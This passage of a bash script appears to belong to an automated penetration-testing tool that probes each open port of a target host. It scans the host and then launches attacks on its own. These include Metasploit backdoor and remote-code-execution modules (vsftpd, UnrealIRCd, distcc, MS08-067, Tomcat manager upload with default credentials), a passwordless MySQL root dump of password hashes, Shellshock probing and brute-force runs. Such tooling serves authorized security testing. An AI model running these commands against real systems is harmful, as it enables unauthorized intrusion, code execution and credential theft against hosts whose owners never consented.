nmap -v -sV -T5 -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET
dirb https://$TARGET
wpscan --url https://$TARGET --batch
wpscan --url https://$TARGET/wordpress/ --batch
python $CMSMAP -t https://$TARGET
python $CMSMAP -t https://$TARGET/wordpress/
arachni https://$TARGET --output-only-positives
sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl
fi
if [ $SCAN_TYPE == "DOMAIN" ]
then
if [ -z $GHDB ]
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
fi
fi
if [ -z "$port_445" ]
then
echo -e "$OKRED+ -- --=[Port 445 closed... skipping.$RESET"
elif [ $SMB = "1" ]
then
echo -e "$OKRED+ -- --=[Port 445 scanned... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 445 opened... running tests...$RESET"
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
if [ -z "$port_512" ]
then
echo -e "$OKRED+ -- --=[Port 512 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 512 opened... running tests...$RESET"
nmap -sV -T5 -p 512 --script=rexec* $TARGET
fi
if [ -z "$port_513" ]
then
echo -e "$OKRED+ -- --=[Port 513 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 513 opened... running tests...$RESET"
nmap -sV -T5 -p 513 --script=rlogin* $TARGET
fi
if [ -z "$port_514" ]
then
echo -e "$OKRED+ -- --=[Port 514 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 514 opened... running tests...$RESET"
amap $TARGET 514 -A
fi
if [ -z "$port_2049" ]
then
echo -e "$OKRED+ -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 2049 opened... running tests...$RESET"
nmap -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
fi
if [ -z "$port_2121" ]
then
echo -e "$OKRED+ -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 2121 opened... running tests...$RESET"
nmap -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
if [ -z "$port_3306" ]
then
echo -e "$OKRED+ -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 3306 opened... running tests...$RESET"
nmap -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
if [ -z "$port_3128" ]
then
echo -e "$OKRED+ -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 3128 opened... running tests...$RESET"
nmap -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ]
then
echo -e "$OKRED+ -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 3389 opened... running tests...$RESET"
nmap -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
if [ -z "$port_3632" ]
then
echo -e "$OKRED+ -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 3632 opened... running tests...$RESET"
nmap -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
if [ -z "$port_5432" ]
then
echo -e "$OKRED+ -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 5432 opened... running tests...$RESET"
nmap -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ]
then
echo -e "$OKRED+ -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 5800 opened... running tests...$RESET"
nmap -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ]
then
echo -e "$OKRED+ -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 5900 opened... running tests...$RESET"
nmap -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_6000" ]
then
echo -e "$OKRED+ -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 6000 opened... running tests...$RESET"
nmap -sV -T5 --script=x11* -p 6000 $TARGET
fi
if [ -z "$port_6667" ]
then
echo -e "$OKRED+ -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 6667 opened... running tests...$RESET"
nmap -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
if [ -z "$port_8000" ]
then
echo -e "$OKRED+ -- --=[Port 8000 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 8000 opened... running tests...$RESET"
wafw00f http://$TARGET:8000
echo ""
whatweb http://$TARGET:8000
echo ""
xsstracer $TARGET 8000
sslscan --no-failed $TARGET:8000
cd MassBleed
./massbleed $TARGET port 8000
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
fi
if [ -z "$port_8100" ]
then
echo -e "$OKRED+ -- --=[Port 8100 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 8100 opened... running tests...$RESET"
wafw00f http://$TARGET:8100
echo ""
whatweb http://$TARGET:8100
echo ""
xsstracer $TARGET 8100
sslscan --no-failed $TARGET:8100
cd MassBleed
./massbleed $TARGET port 8100
cd ..
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
fi
if [ -z "$port_8080" ]
then
echo -e "$OKRED+ -- --=[Port 8080 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 8080 opened... running tests...$RESET"
wafw00f http://$TARGET:8080
echo ""
whatweb http://$TARGET:8080
echo ""
xsstracer $TARGET 8080
sslscan --no-failed $TARGET:8080
cd MassBleed
./massbleed $TARGET port 8080
cd ..
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
nmap -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
python jexboss/jexboss.py http://$TARGET:8080
python jexboss/jexboss.py https://$TARGET:8080
fi
if [ -z "$port_8180" ]
then
echo -e "$OKRED+ -- --=[Port 8180 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 8180 opened... running tests...$RESET"
wafw00f http://$TARGET:8180
echo ""
whatweb http://$TARGET:8180
echo ""
xsstracer $TARGET 8180
sslscan --no-failed $TARGET:8180
cd MassBleed
./massbleed $TARGET port 8180
cd ..
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=loot/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
fi
if [ -z "$port_8443" ]
then
echo -e "$OKRED+ -- --=[Port 8443 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 8443 opened... running tests...$RESET"
wafw00f http://$TARGET:8443
echo ""
whatweb http://$TARGET:8443
echo ""
xsstracer $TARGET 8443
sslscan --no-failed $TARGET:8443
cd MassBleed
./massbleed $TARGET port 8443
cd ..
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
nmap -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_10000" ]
then
echo -e "$OKRED+ -- --=[Port 10000 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 10000 opened... running tests...$RESET"
msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
if [ -z "$port_49152" ]
then
echo -e "$OKRED+ -- --=[Port 49152 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 49152 opened... running tests...$RESET"
$SUPER_MICRO_SCAN $TARGET
fi
if [ "$MODE" = "nobrute" ]; then
echo -e "$OKGREEN################################### Skipping Brute Force ############################$RESET"
else
echo -e "$OKGREEN################################### Running Brute Force #############################$RESET"
cd yasuo
ruby yasuo.rb -r $TARGET -b all
cd ../BruteX
./brutex $TARGET
rm -f hydra.restore
mv loot/* ../loot/
cd ..
echo ""
rm -f scan.log
fi
echo -e "$OKGREEN################################### Done! ###########################################$RESET"
exit 0